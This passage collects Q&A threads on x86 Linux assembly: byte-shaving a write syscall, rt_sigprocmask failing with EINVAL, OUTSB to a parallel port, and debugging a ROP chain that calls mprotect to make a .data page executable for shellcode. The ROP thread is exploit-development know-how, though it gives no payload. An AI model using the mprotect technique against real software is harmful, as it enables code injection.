But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).
mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.
(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)
I would like to block all signals in a function using sigprocmask in assembly.
The following code works in C:
#include <stdio.h>
#include <signal.h>
int main() {
sigset_t n={(unsigned long int) 0xffffffff};
sigprocmask (SIG_BLOCK, &n, 0);
for (int i=0; i<0x8ffff; i++) printf(".");
}
When the code executes and starts printing dots on the terminal, I cannot interrupt it with Ctrl+C. So far so good.
The value of SIG_BLOCK is 0, apparently; and the syscall number for sys_rt_sigprocmask is 14:
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64
So I write:
[BITS 64]
[section .text align=1]
global main
main:
mov r10, 32
mov rdx, 0
mov rsi, newmask
mov rdi, 0
mov rax, 14
syscall
dotPrintLoop:
mov rdi, dotstring
mov rax, 0
syscall
jmp dotPrintLoop
[section .data align=1]
dotstring: db ".",0
newmask: dd 0xffffffff
dd 0xffffffff
dd 0xffffffff
...
And it does not work. gdb reveals that rax has the value -22 (EINVAL - "invalid parameter") after the first syscall; whereas the second syscall (of sys_write) works just fine.
What am I doing wrong?
Apparently r10 should hold the value 8 instead of 32.
I encountered 4 different definitions of sigset_t within the kernel code, and sizeof gives a different result for each of them (32, 128, 4 and 8, as I recall). Only the last one is relevant to the syscall.
The kernel first checks that r10 == sizeof(sigset_t), and returns EINVAL (-22) if that does not hold. The value of sizeof(sigset_t) is equal to 8 for both 32-bit and 64-bit versions.
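The size check is easy to observe from user space. The following Python 3 sketch goes through libc's syscall() wrapper with ctypes; it assumes Linux on x86-64 (syscall number 14, as in the question), and `raw_sigprocmask`, `KERNEL_NSIG` and `KERNEL_SIGSET_BYTES` are names made up for illustration. It passes an empty mask, so it does not actually block anything.

```python
import ctypes
import errno
import platform

SYS_RT_SIGPROCMASK = 14  # x86-64 syscall number, as used in the question
SIG_BLOCK = 0
KERNEL_NSIG = 64         # number of signals in the x86 kernel's sigset_t
KERNEL_SIGSET_BYTES = KERNEL_NSIG // 8


def raw_sigprocmask(sigsetsize: int) -> int:
    """Call rt_sigprocmask with an empty mask; return 0 or the errno value."""
    libc = ctypes.CDLL(None, use_errno=True)
    empty_mask = ctypes.c_uint64(0)  # blocking nothing leaves the process unchanged
    result = libc.syscall(
        ctypes.c_long(SYS_RT_SIGPROCMASK),
        ctypes.c_long(SIG_BLOCK),
        ctypes.byref(empty_mask),
        None,  # no interest in the old mask
        ctypes.c_size_t(sigsetsize),
    )
    return 0 if result == 0 else ctypes.get_errno()


if __name__ == "__main__":
    if platform.system() == "Linux" and platform.machine() == "x86_64":
        print("size 8: ", raw_sigprocmask(KERNEL_SIGSET_BYTES))
        print("size 32:", raw_sigprocmask(32), "(EINVAL is", errno.EINVAL, ")")
```

The fourth argument of the raw syscall is the one that travels in r10, which is why changing it from 32 to 8 in the assembly is enough.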
I'm writing some ROP exploit code that calls mprotect via a syscall. After invoking int 0x80, eax is set to 0x0, indicating success, but shifting execution to the target address still results in a SIGSEGV. I would love for someone to show me where I went wrong.
Some details: the target address is in the .data section, which is where I'll be writing my shellcode:
[20] 0x8146820->0x814c2b8 at 0x000fd820: .data ALLOC LOAD DATA HAS_CONTENTS
I set eax to 125, ebx to the page boundary 0x8146000, ecx to 0x1000 (4096 page size) and edx to 0x7 (RWX).
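The page arithmetic behind those register values can be sketched in Python 3. `page_span` is a hypothetical helper; the addresses are the .data bounds listed above, and the 4096-byte page size is the one stated in the question.

```python
PAGE_SIZE = 0x1000  # 4096-byte pages, as stated in the question


def page_span(start: int, end: int, page_size: int = PAGE_SIZE):
    """Return (aligned_start, length) of the whole pages covering [start, end)."""
    aligned_start = start & ~(page_size - 1)
    aligned_end = (end + page_size - 1) & ~(page_size - 1)
    return aligned_start, aligned_end - aligned_start


data_start, data_end = 0x8146820, 0x814C2B8

# mprotect needs a page-aligned address: round the start of .data down.
first_page = data_start & ~(PAGE_SIZE - 1)
print(hex(first_page))

# Covering all of .data would take more than one page.
start, length = page_span(data_start, data_end)
print(hex(start), hex(length))
```

A length of 0x1000 changes only the first page, which is enough here because the jump target 0x8146820 lies inside it.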
Just before the syscall the registers look like this:
eax 0x7d 125
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0182 0x80c0182 <mprotect+18>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) disas $eip, $eip+20
Dump of assembler code from 0x80c0182 to 0x80c0196:
=> 0x080c0182 <mprotect+18>: int $0x80
0x080c0184 <mprotect+20>: pop %ebx
0x080c0185 <mprotect+21>: cmp $0xfffff001,%eax
0x080c018a <mprotect+26>: jae 0x80c7d80 <__syscall_error>
0x080c0190 <mprotect+32>: ret
and after the syscall the registers are:
(gdb) si
0x080c0184 in mprotect ()
(gdb) i r
eax 0x0 0
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0184 0x80c0184 <mprotect+20>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
However the memory location does not show a change in permissions and attempting to execute instructions there terminates the application:
(gdb) x/4x 0x8146820
0x8146820: 0x00000000 0x00000000 0x08146154 0x0000ea60
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08146820 in data_start ()
Any suggestions on how/what to debug or what I'm doing wrong are welcome.
Edit
I ran it under strace without the debugger attached, seems like the mprotect call is a success, yet execution fails:
stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2197, ...}) = 0
mprotect(0x8146000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0} ---
+++ killed by SIGSEGV (core dumped) +++
Confirming crash address from core:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x08146820 in data_start ()
Your mprotect call worked. The program crashes because 0x8146820 holds the bytes 00 00, which disassemble to add [eax], al, and eax holds zero. Address 0 is not mapped, which is why the segfault is reported with si_addr=0.
I'm trying to write byte 0xff to the parallel port at 0x378. It compiles and links without issue, but segfaults at the OUTSB instruction.
section .text
global _start
_err_exit:
mov eax, 1
mov ebx, 1
int 80h
_start:
mov eax, 101 ; ioperm
mov ebx, 0x378 ; Parallel port addr
mov ecx, 2 ; number of bytes to 'unlock'
mov edx, 1 ; enable
int 80h
mov esi, 0xff
mov dx, 0x378
outsb
mov eax, 1 ; exit
mov ebx, 0
int 80h
If I step through it with GDB and check the registers just before the OUTSB instruction, it doesn't look like there is anything in the DX register? or dx == edx in 32bit?
(gdb) info registers
eax 0x0 0
ecx 0x2 2
edx 0x378 888
ebx 0x378 888
esp 0xffffd810 0xffffd810
ebp 0x0 0x0
esi 0xff 255
edi 0x0 0
eip 0x8048090 0x8048090 <_start+36>
eflags 0x246 [ PF ZF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
What am I doing wrong here?
(info on the OUTS instructions: http://siyobik.info/main/reference/instruction/OUTS%2FOUTSB%2FOUTSW%2FOUTSD)
EDIT:
The C version of the program works:
#include <sys/io.h>
int main(int argc, char *argv[])
{
int addr = 0x378;
int result = ioperm(addr,5,1);
outb(0xff, addr);
}
There are a number of issues with that code. Firstly, keep in mind that OUTSB, like the other port I/O instructions, is privilege-sensitive: executed from ordinary user-space code without I/O permission, it makes the CPU raise a General Protection Fault, which Linux reports as a segmentation fault. The ioperm syscall is what grants a process access to specific ports, and it only succeeds for a privileged (root) process, so make sure it returned 0 before touching the port.
Secondly, OUTSB writes a byte from the memory location that ESI points to, to the I/O port in DX. Here you're telling the processor to read the byte from address 0xff, which the process surely doesn't have mapped. You can avoid that by using the plain OUT instruction, since OUTSB is really meant to be used with the REP prefix. Try this:
mov al, 0xff
mov dx, 0x378
out dx, al
This outputs the byte in al to the I/O port held in dx. The immediate-port form of OUT only takes an 8-bit port number (0 to 255), so a port like 0x378 has to go through dx.
Let me know how that turned out.